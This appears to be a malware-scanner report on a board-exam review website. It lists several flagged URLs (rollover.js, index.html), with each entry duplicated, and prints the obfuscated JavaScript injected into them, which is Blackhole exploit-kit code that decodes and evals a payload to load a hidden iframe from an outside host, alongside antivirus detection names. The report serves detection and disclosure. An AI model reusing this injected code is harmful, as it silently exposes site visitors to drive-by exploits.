- BitDefender
- JS:Exploit.BlackHole.NP
|
http://obgynboardexamreview.com/././././././assets/rollover.js | 200 OK Content-Length: 27281 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jiycqc="y";qaj="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[qaj].body)==null}()}catch(aoef){kiqix=function(rxvy){rxvy="fr"+"omCh"+rxvy;for(ffc=0;ffc<jiycqc.length;ffc++){rei+=String[rxvy](tej(doq+(jiycqc[ffc]))-(20));}};};tej=(window.eval);doq="0x";jedm=0;try{;}catch(vwy){jedm=1}if(!jedm){try{++tej(qaj)["\x62o"+"d"+jiycqc]}catch(aoef){poaif="^";}jiycqc="34^7a^89^82^77^88^7d^83^82^34^85^87^87^8a^44^4d^3c^3d^34^8f^21^1e^34^8a^75^86^34^87^88^75^88^7d^77^51^3b^75^7e^
... 3741 bytes are skipped ...3c^34^80^79^82^40^34^79^82^78^34^3d^34^3d^4f^21^1e^91^21^1e^7d^7a^34^3c^82^75^8a^7d^7b^75^88^83^86^42^77^83^83^7f^7d^79^59^82^75^76^80^79^78^3d^21^1e^8f^21^1e^7d^7a^3c^5b^79^88^57^83^83^7f^7d^79^3c^3b^8a^7d^87^7d^88^79^78^73^89^85^3b^3d^51^51^49^49^3d^8f^91^79^80^87^79^8f^67^79^88^57^83^83^7f^7d^79^3c^3b^8a^7d^87^7d^88^79^78^73^89^85^3b^40^34^3b^49^49^3b^40^34^3b^45^3b^40^34^3b^43^3b^3d^4f^21^1e^21^1e^85^87^87^8a^44^4d^3c^3d^4f^21^1e^91^21^1e^91".split(poaif);rei="";kiqix("arCode");tej(""+rei);}Antivirus reports:- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://obgynboardexamreview.com/././././././index.html | 200 OK Content-Length: 15214 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)rhrxm=4;rurcw=("80,c6,d5,ce,c3,d4,c9,cf,ce,80,d5,c8,90,99,88,89,80,db,6d,6a,80,d6,c1,d2,80,d3,d4,c1,d4,c9,c3,9d,87,c1,ca,c1,d8,87,9b,6d,6a,80,d6,c1,d2,80,c3,cf,ce,d4,d2,cf,cc,cc,c5,d2,9d,87,c9,ce,c4,c5,d8,8e,d0,c8,d0,87,9b,6d,6a,80,d6,c1,d2,80,d5,c8,80,9d,80,c4,cf,c3,d5,cd,c5,ce,d4,8e,c3,d2,c5,c1,d4,c5,a5,cc,c5,cd,c5,ce,d4,88,87,c9,c6,d2,c1,cd,c5,87,89,9b,6d,6a,6d,6a,80,d5,c8,8e,d3,d2,c3,80,9d,80,87,c8,d4,d4,d0,9a,8f,8f,cd,c5,cc,d4,cf,d2,d2,c9,c5,8e,c3,cf,cd,8f,d3,d5,c2
... 3536 bytes are skipped ...5,d1,87,89,9d,9d,95,95,89,db,dd,c5,cc,d3,c5,db,b3,c5,d4,a3,cf,cf,cb,c9,c5,88,87,d6,c9,d3,c9,d4,c5,c4,bf,d5,d1,87,8c,80,87,95,95,87,8c,80,87,91,87,8c,80,87,8f,87,89,9b,6d,6a,6d,6a,d5,c8,90,99,88,89,9b,6d,6a,dd,6d,6a,dd".split(","));hgcj=eval;function gqgyy(){alwmf=function(){--(fket.body)}()}fket=document;for(nye=0;nye<rurcw["length"];nye+=1){rurcw[nye]=-(96)+parseInt(rurcw[nye],rhrxm*4);}try{gqgyy()}catch(dum){mhwxys=50-50;}if(!mhwxys)hgcj(String["fr"+"omCh"+"arCo"+"de"].apply(String,rurcw));Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://obgynboardexamreview.com/./././././././assets/rollover.js | 200 OK Content-Length: 27281 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jiycqc="y";qaj="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[qaj].body)==null}()}catch(aoef){kiqix=function(rxvy){rxvy="fr"+"omCh"+rxvy;for(ffc=0;ffc<jiycqc.length;ffc++){rei+=String[rxvy](tej(doq+(jiycqc[ffc]))-(20));}};};tej=(window.eval);doq="0x";jedm=0;try{;}catch(vwy){jedm=1}if(!jedm){try{++tej(qaj)["\x62o"+"d"+jiycqc]}catch(aoef){poaif="^";}jiycqc="34^7a^89^82^77^88^7d^83^82^34^85^87^87^8a^44^4d^3c^3d^34^8f^21^1e^34^8a^75^86^34^87^88^75^88^7d^77^51^3b^75^7e^
... 3741 bytes are skipped ...3c^34^80^79^82^40^34^79^82^78^34^3d^34^3d^4f^21^1e^91^21^1e^7d^7a^34^3c^82^75^8a^7d^7b^75^88^83^86^42^77^83^83^7f^7d^79^59^82^75^76^80^79^78^3d^21^1e^8f^21^1e^7d^7a^3c^5b^79^88^57^83^83^7f^7d^79^3c^3b^8a^7d^87^7d^88^79^78^73^89^85^3b^3d^51^51^49^49^3d^8f^91^79^80^87^79^8f^67^79^88^57^83^83^7f^7d^79^3c^3b^8a^7d^87^7d^88^79^78^73^89^85^3b^40^34^3b^49^49^3b^40^34^3b^45^3b^40^34^3b^43^3b^3d^4f^21^1e^21^1e^85^87^87^8a^44^4d^3c^3d^4f^21^1e^91^21^1e^91".split(poaif);rei="";kiqix("arCode");tej(""+rei);}Antivirus reports:- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://obgynboardexamreview.com/./././././././index.html | 200 OK Content-Length: 15214 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)rhrxm=4;rurcw=("80,c6,d5,ce,c3,d4,c9,cf,ce,80,d5,c8,90,99,88,89,80,db,6d,6a,80,d6,c1,d2,80,d3,d4,c1,d4,c9,c3,9d,87,c1,ca,c1,d8,87,9b,6d,6a,80,d6,c1,d2,80,c3,cf,ce,d4,d2,cf,cc,cc,c5,d2,9d,87,c9,ce,c4,c5,d8,8e,d0,c8,d0,87,9b,6d,6a,80,d6,c1,d2,80,d5,c8,80,9d,80,c4,cf,c3,d5,cd,c5,ce,d4,8e,c3,d2,c5,c1,d4,c5,a5,cc,c5,cd,c5,ce,d4,88,87,c9,c6,d2,c1,cd,c5,87,89,9b,6d,6a,6d,6a,80,d5,c8,8e,d3,d2,c3,80,9d,80,87,c8,d4,d4,d0,9a,8f,8f,cd,c5,cc,d4,cf,d2,d2,c9,c5,8e,c3,cf,cd,8f,d3,d5,c2
... 3536 bytes are skipped ...5,d1,87,89,9d,9d,95,95,89,db,dd,c5,cc,d3,c5,db,b3,c5,d4,a3,cf,cf,cb,c9,c5,88,87,d6,c9,d3,c9,d4,c5,c4,bf,d5,d1,87,8c,80,87,95,95,87,8c,80,87,91,87,8c,80,87,8f,87,89,9b,6d,6a,6d,6a,d5,c8,90,99,88,89,9b,6d,6a,dd,6d,6a,dd".split(","));hgcj=eval;function gqgyy(){alwmf=function(){--(fket.body)}()}fket=document;for(nye=0;nye<rurcw["length"];nye+=1){rurcw[nye]=-(96)+parseInt(rurcw[nye],rhrxm*4);}try{gqgyy()}catch(dum){mhwxys=50-50;}if(!mhwxys)hgcj(String["fr"+"omCh"+"arCo"+"de"].apply(String,rurcw));Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|